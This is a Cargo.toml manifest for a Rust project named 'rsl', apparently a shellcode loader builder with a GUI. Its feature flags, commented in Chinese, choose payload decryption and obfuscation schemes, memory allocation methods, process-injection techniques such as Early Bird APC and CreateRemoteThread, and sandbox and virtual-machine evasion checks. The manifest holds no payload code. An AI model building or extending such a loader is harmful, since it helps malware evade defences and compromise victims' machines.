cargo-features = ["trim-paths", "panic-immediate-abort"]

[package]
name = "rsl"
version = "1.1.1"
edition = "2021"

[[bin]]
name = "gui"
path = "src/bin/gui.rs"

[[bin]]
name = "rsl"
path = "src/main.rs"

[dependencies]
tempfile = "3.10.1"
base64 = "0.21.5"
base32 = "0.5.1"
windows-sys = { version = "0.42.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_LibraryLoader"] }
winreg = "0.52.0"
uuid = { version = "1.0", features = ["v4"] }
memmap2 = "0.6.1"
dirs = "4.0"
sha2 = "0.10"
rustcrypt-ct-macros = "0.1"
aes = "0.8"
chacha20 = "0.8"
generic-array = "0.14"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
wmi = "0.9"
aes-gcm = "0.10"
rc4 = "0.1"
typenum = "1.16"
cipher = "0.4"
cbc = "0.1"
ascon-aead = "0.4.2"
sm4 = "0.5"
ctr = "0.9"
chacha20poly1305 = "0.10"
egui = "0.24.1"
eframe = "0.24.1"
rfd = "0.14"
anyhow = "1.0"
log = "0.4"
env_logger = "0.11"

[build-dependencies]
embed-resource = "1.8.0"

[features]
default = ["decrypt_ipv4", "alloc_mem_va", "run_create_thread", "none_decode"]

# 解密算法特性开关
none_decode = []
base64_decode = []
base32_decode = []
decrypt_rc4 = []                # 启用RC4解密
decrypt_ipv4 = []               # 启用IPv4解密
decrypt_ipv6 = []               # 启用IPv6解密
decrypt_mac = []                  # 启用MAC解密
decrypt_uuid = []               # 启用UUID解密
decrypt_aes = []                # 启用AES解密
decrypt_xchacha20 = []          # 启用XChaCha20-Poly1305解密

# 内存分配方式
alloc_mem_va = []
alloc_mem_global = []
alloc_mem_local = []
alloc_mem_heap = []
alloc_mem_mapview = []

# 注入/执行方式
pattern1 = []
pattern2 = []
pattern3 = []
run_enum_ui = ["pattern1"]                # UI线程枚举注入
run_create_thread = ["pattern1"]          # CreateThread注入
run_gdi_families = ["pattern1"]           # GDI家族注入

run_early_bird_apc = ["pattern2"]         # Early Bird APC 注入

run_create_remote_thread = ["pattern3"]    # CreateRemoteThread 远程注入

with_forgery = []               # 启用伪造特性

# 虚拟机/沙箱检测特性
sandbox = []
vm_check_c_drive = ["sandbox"]
vm_check_desktop_files = ["sandbox"]
vm_check_tick = ["sandbox"]
vm_check_mouse = ["sandbox"]

win7 = []

[profile.release]
opt-level = 3
lto = true
codegen-units = 1
strip = true
debug = false
split-debuginfo = "off"
panic = "immediate-abort"
trim-paths = "all"